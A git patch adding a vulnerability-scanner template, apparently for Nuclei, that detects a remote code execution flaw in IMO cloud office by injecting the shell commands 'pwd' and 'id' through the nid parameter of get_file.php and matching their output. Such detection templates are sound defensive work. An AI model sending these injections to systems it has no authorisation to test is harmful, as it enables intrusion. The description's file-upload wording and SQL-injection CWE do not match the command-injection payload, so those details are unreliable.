From b326be4e12e04527e0486fd4bdfb2d011ca13b87 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 9 Sep 2024 13:31:36 +0400
Subject: [PATCH] Create imo-rce.yaml

---
 http/vulnerabilities/imo-rce.yaml | 57 +++++++++++++++++++++++++++++++
 1 file changed, 57 insertions(+)
 create mode 100644 http/vulnerabilities/imo-rce.yaml

diff --git a/http/vulnerabilities/imo-rce.yaml b/http/vulnerabilities/imo-rce.yaml
new file mode 100644
index 0000000000..85f74754b4
--- /dev/null
+++ b/http/vulnerabilities/imo-rce.yaml
@@ -0,0 +1,57 @@
+id: imo-rce
+
+info:
+  name: IMO - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: |
+    The lax filtering of imo cloud office/file/NDisk/get_file.php allows unlimited file uploads. Attackers can directly obtain website permissions through this vulnerability.
+  reference:
+    - https://www.henry4e36.top/index.php/archives/130.html#cl-1
+    - https://forum.butian.net/article/213
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-89
+  metadata:
+    max-request: 3
+  tags: imo,rce
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'imo'
+        case-insensitve: true
+        internal: true
+
+  - raw:
+      - |
+        GET /file/NDisk/get_file.php?cid=1&nid=;pwd; HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /file/NDisk/get_file.php?cid=1&nid=;id; HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_1
+        regex:
+          - 'home/www/html/[^"]*/file/NDisk'
+
+      - type: regex
+        part: body_2
+        regex:
+          - "uid=[0-9]+.*gid=[0-9]+.*"